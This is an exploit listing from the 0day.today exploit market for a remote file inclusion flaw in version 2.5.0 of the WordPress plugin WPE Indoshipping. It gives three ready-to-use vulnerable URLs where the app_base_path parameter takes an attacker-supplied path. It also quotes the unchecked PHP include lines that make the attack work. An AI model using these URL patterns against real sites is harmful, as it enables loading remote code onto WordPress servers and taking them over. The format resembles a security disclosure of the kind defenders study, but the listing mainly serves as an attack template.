[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin WPE Indoshipping Remote File Inclusion

Author
altiiever
Risk
[
Security Risk Low
]
0day-ID
0day-ID-21559
Category
web applications
Date add
23-11-2013
Platform
php
```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================

|
| [ Vulnerable ] 
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
| 
| [!] wpe_indoshipping.php
|	-include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
|	-include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
|	-include $app_base_path.'admin/admin-functions.php';
|	-include $app_base_path.'admin/shipping-manager.php';
|	-include $app_base_path.'admin/form-builder.php';
|	-include $app_base_path.'admin/tools.php';
|	-include $app_base_path.'assets/readme.html';
|

#  0day.today [2024-11-15]  #